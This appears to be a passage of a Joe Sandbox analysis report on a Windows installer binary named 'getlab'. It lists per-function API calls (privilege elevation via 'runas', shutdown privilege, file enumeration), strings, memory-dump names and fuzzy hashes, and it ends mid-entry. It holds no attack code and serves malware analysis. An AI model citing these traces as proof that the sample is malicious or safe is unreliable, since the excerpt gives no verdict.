                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                          • String ID: =G$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                          • API String ID: 883996979-2356621170
                                                                          • Opcode ID: b678e359fd0ae47c3c5922cbe0b0ba0238e438d4a6a95f87c38f16ae302c5cef
                                                                          • Instruction ID: f917ad2a0ddd76f9e2927b7da1bf40d86712eb5f256f3455e7a65403f61927fd
                                                                          • Opcode Fuzzy Hash: b678e359fd0ae47c3c5922cbe0b0ba0238e438d4a6a95f87c38f16ae302c5cef
                                                                          • Instruction Fuzzy Hash: 6A317670A40648AFDB10EFA6C845ADE76B8EB09318F91847FF518E7281DB7C4909CB59
                                                                          Function 00422854 Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229EC
                                                                          • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BB6), ref: 004229FC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1631623395-0
                                                                          • Opcode ID: c219f7c537efeea3579c9411d70f54cec51da60040311af4759150a5570cff70
                                                                          • Instruction ID: 1945ea129714beb182378817fb96d2750a9cf3de1b1d00e1964b2da952e4e1c4
                                                                          • Opcode Fuzzy Hash: c219f7c537efeea3579c9411d70f54cec51da60040311af4759150a5570cff70
                                                                          • Instruction Fuzzy Hash: 54917071B04254BFDB10DFA9DA86F9E77F4AB04304F5501BAF904AB292C778AE40DB58
                                                                          Function 0041837C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 0041838B
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 004183A8
                                                                          • GetWindowRect.USER32(?), ref: 004183C4
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004183D2
                                                                          • GetWindowLongA.USER32(?,000000F8), ref: 004183E7
                                                                          • ScreenToClient.USER32(00000000), ref: 004183F0
                                                                          • ScreenToClient.USER32(00000000,?), ref: 004183FB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                          • String ID: ,
                                                                          • API String ID: 2266315723-3772416878
                                                                          • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                          • Instruction ID: e201a0486811adc056edcb3d82b1b2fee19cba914b7849b2462e59dde51cd5f3
                                                                          • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                          • Instruction Fuzzy Hash: A3112BB1505201ABEB00DF69C885F9B77E8AF48314F15067EFD58DB296D738D900CBA9
                                                                          Function 004555B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 004555C7
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555CD
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555E6
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045560D
                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455612
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00455623
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 107509674-3733053543
                                                                          • Opcode ID: bb799306ba89914f4ad5c57bf57863a6c2a35b94d1ae8b7cd1197278bb0a2066
                                                                          • Instruction ID: a3beb9442be635481dc24a528bf80296f5a6403aa298a4e6fe1161b8e304ba10
                                                                          • Opcode Fuzzy Hash: bb799306ba89914f4ad5c57bf57863a6c2a35b94d1ae8b7cd1197278bb0a2066
                                                                          • Instruction Fuzzy Hash: 46F09C70294B46B5E610A6758C17F3B71889B44759F94483AFE05EE1C3EBBCD90C4A3E
                                                                          Function 0045CFA8 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045CFB1
                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045CFC1
                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045CFD1
                                                                          • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047EFB7,00000000,0047EFE0), ref: 0045CFF6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CryptVersion
                                                                          • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                          • API String ID: 1951258720-508647305
                                                                          • Opcode ID: 85d4af24599792157b57fa29dc23e54678ac232aa88ac9caf84ed8bf40255b48
                                                                          • Instruction ID: aa10fef992bac70bb4986ae7772dd6d371a0f40a2d4a4027d6f3d37c18d15e1e
                                                                          • Opcode Fuzzy Hash: 85d4af24599792157b57fa29dc23e54678ac232aa88ac9caf84ed8bf40255b48
                                                                          • Instruction Fuzzy Hash: A1F0F9B0940700DBE728EFB6ACC67267795EBE570AF54813BA409911A2D7784499CB1C
                                                                          Function 004975B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC,?,?,00000000,0049B628), ref: 00497607
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049768A
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000), ref: 004976A2
                                                                          • FindClose.KERNEL32(000000FF,004976CD,004976C6,?,00000000,?,00000000,004976EE,?,?,00000000,0049B628,?,00497878,00000000,004978CC), ref: 004976C0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirstNext
                                                                          • String ID: isRS-$isRS-???.tmp
                                                                          • API String ID: 134685335-3422211394
                                                                          • Opcode ID: 9a85730e70ae0ef94d3f90e2644594d3b330f28a48244bbcf8e97e2e49ccae5c
                                                                          • Instruction ID: ac0d863a46ff1cebd9ad17e119327f8a53363d7c8f83829e6742a95b9ddb5555
                                                                          • Opcode Fuzzy Hash: 9a85730e70ae0ef94d3f90e2644594d3b330f28a48244bbcf8e97e2e49ccae5c
                                                                          • Instruction Fuzzy Hash: 61317471914608ABCF10EF65CC41ADEBBBCDB45714F5184FBA908E32A1DB389E458F58
                                                                          Function 004573B4 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457431
                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457458
                                                                          • SetForegroundWindow.USER32(?), ref: 00457469
                                                                          • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457741,?,00000000,0045777D), ref: 0045772C
                                                                          Strings
                                                                          • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                          • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                          • API String ID: 2236967946-3182603685
                                                                          • Opcode ID: 940e73e70c62a340de322ee314cac5bbcdf296114091b71c1d6fda21dc567a05
                                                                          • Instruction ID: ea769b4c14fff8c8931e63d970561434c834200915b3ece1ca1c477b8b524b3f
                                                                          • Opcode Fuzzy Hash: 940e73e70c62a340de322ee314cac5bbcdf296114091b71c1d6fda21dc567a05
                                                                          • Instruction Fuzzy Hash: A591E234608204EFD715CF55E9A1F5ABBF9FB49704F2180BAE80497792C638AE05DF58
                                                                          Function 00455DE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F1F), ref: 00455E10
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E16
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                          • API String ID: 1646373207-3712701948
                                                                          • Opcode ID: 2a586cdd6d3b5b624cec46e44aab5337d0e4580ac2e02e9277c845893915eeed
                                                                          • Instruction ID: 94d637f012244594286cd058a6e690650624bbac00cb131118490790a059a9ff
                                                                          • Opcode Fuzzy Hash: 2a586cdd6d3b5b624cec46e44aab5337d0e4580ac2e02e9277c845893915eeed
                                                                          • Instruction Fuzzy Hash: F6416271A04649ABCF01EFA5C892DEEB7B8EF48304F504566E800F7292D6785E09CB68
                                                                          Function 00417CC8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00417D07
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D25
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D5B
                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D82
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Placement$Iconic
                                                                          • String ID: ,
                                                                          • API String ID: 568898626-3772416878
                                                                          • Opcode ID: e47ccc7c96dd650ee5aa99fe86ba7015ba4d078f2208ea4d0e2f2c43afaedfea
                                                                          • Instruction ID: 4a262c2e3c05075ab76cb34d6dc8316acc681754e7f1d5d7fcc9d539da6ecccc
                                                                          • Opcode Fuzzy Hash: e47ccc7c96dd650ee5aa99fe86ba7015ba4d078f2208ea4d0e2f2c43afaedfea
                                                                          • Instruction Fuzzy Hash: A9213E716002089BDF10EFA9D8C0ADA77B8AF58314F15416AFE19DF246D638ED44CBA8
                                                                          Function 00463B04 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,00463CC1), ref: 00463B35
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463BC4
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C56
                                                                          • FindClose.KERNEL32(000000FF,00463C7D,00463C76,?,00000000,?,00000000,00463C94,?,00000001,00000000,00463CC1), ref: 00463C70
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                          • String ID:
                                                                          • API String ID: 4011626565-0
                                                                          • Opcode ID: 9e4b21a255c9957acc66722b8fb030e028549ea653889a09ad31eb4a852fe968
                                                                          • Instruction ID: 72b898f2585741bb0186620e4596b31eb4d76daf54761f31677757d41602065f
                                                                          • Opcode Fuzzy Hash: 9e4b21a255c9957acc66722b8fb030e028549ea653889a09ad31eb4a852fe968
                                                                          • Instruction Fuzzy Hash: E941B971A00A54AFCB10EF65CC55ADEB7B8EB88705F4044BAF404B7381E67C9F488E19
                                                                          Function 00463F80 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,00464167), ref: 00463FF5
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046403B
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 004640F0
                                                                          • FindClose.KERNEL32(000000FF,0046411B,00464114,?,00000000,?,00000000,00464132,?,00000001,00000000,00464167), ref: 0046410E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                          • String ID:
                                                                          • API String ID: 4011626565-0
                                                                          • Opcode ID: c09ef32585df6ad6587d46f89372b88c2f663d9922c9a38294b644e1f7da4993
                                                                          • Instruction ID: c50a8f924641f435bcadfb0116f3895028b18db14577d5a571763064cbfe8c6c
                                                                          • Opcode Fuzzy Hash: c09ef32585df6ad6587d46f89372b88c2f663d9922c9a38294b644e1f7da4993
                                                                          • Instruction Fuzzy Hash: 77417674A00A18DFCB11EFA5CD859DEB7B8FB88315F4044AAF804A7341E7789E858E59
                                                                          Function 0042E92C Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E94E
                                                                          • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E979
                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E986
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E98E
                                                                          • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F13,00000000,00452F34), ref: 0042E994
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                          • String ID:
                                                                          • API String ID: 1177325624-0
                                                                          • Opcode ID: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                                          • Instruction ID: 3f40d390e8a5df174f84cdc2f44e01f6cfa8788c97922530efddc0b1fccee370
                                                                          • Opcode Fuzzy Hash: d6b6e6a3c56c44dba96863f891d7151671ed351fcb177b64f87cc52fc7469355
                                                                          • Instruction Fuzzy Hash: 31F0CDB23A17207AF520717A5C86F6B018CC789B68F10823BBB04FF1C1E9A85D0545AD
                                                                          Function 00482EF8 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00482F36
                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00482F54
                                                                          • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F76
                                                                          • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A4,0048241A,0048244E,00000000,0048246E,?,?,?,0049C0A4), ref: 00482F8A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$IconicLong
                                                                          • String ID:
                                                                          • API String ID: 2754861897-0
                                                                          • Opcode ID: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                                          • Instruction ID: 41c7b109e84caadfbd7bdb59434551f42a7ac603c048c530ac1057f10a9e5501
                                                                          • Opcode Fuzzy Hash: 9bd873c9f0220d19758c381c5bb4dd0340ed2cd746ce77723441eba7bf105e49
                                                                          • Instruction Fuzzy Hash: F30152742452009FD600F7A58E89B6B33E55B14304F480977BB009F2E6CAADD841E71C
                                                                          Function 00462578 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,0046264C), ref: 004625D0
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0046262C,?,00000000,?,00000000,0046264C), ref: 0046260C
                                                                          • FindClose.KERNEL32(000000FF,00462633,0046262C,?,00000000,?,00000000,0046264C), ref: 00462626
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                                          • Instruction ID: 35f3f22b183c5d1ecd4ea1753066c09f008546f1eb4ef8afe9bdb694ca888e99
                                                                          • Opcode Fuzzy Hash: b00d8aacf9e7513e04c7705060d933e78633390233e65912034b0f0047bc0786
                                                                          • Instruction Fuzzy Hash: 07210B31904B047ECB11EB75CC41ACEBBBCDB49304F5084F7A808E21A1E6789E55CE5A
                                                                          Function 004241D4 Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 004241DC
                                                                          • SetActiveWindow.USER32(?,?,?,0046CB73), ref: 004241E9
                                                                            • Part of subcall function 00423644: ShowWindow.USER32(00410648,00000009,?,00000000,0041ED9C,00423932,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C04), ref: 0042365F
                                                                            • Part of subcall function 00423B0C: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021525AC,00424202,?,?,?,0046CB73), ref: 00423B47
                                                                          • SetFocus.USER32(00000000,?,?,?,0046CB73), ref: 00424216
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveFocusIconicShow
                                                                          • String ID:
                                                                          • API String ID: 649377781-0
                                                                          • Opcode ID: 362a53b09b72621cbce2071a633a460a23dddc7e90100e91eac1f534d9fc78be
                                                                          • Instruction ID: 7ea1460413e76a83717bea1d3364086182948ca7ce33fd4e030d283203b7bb74
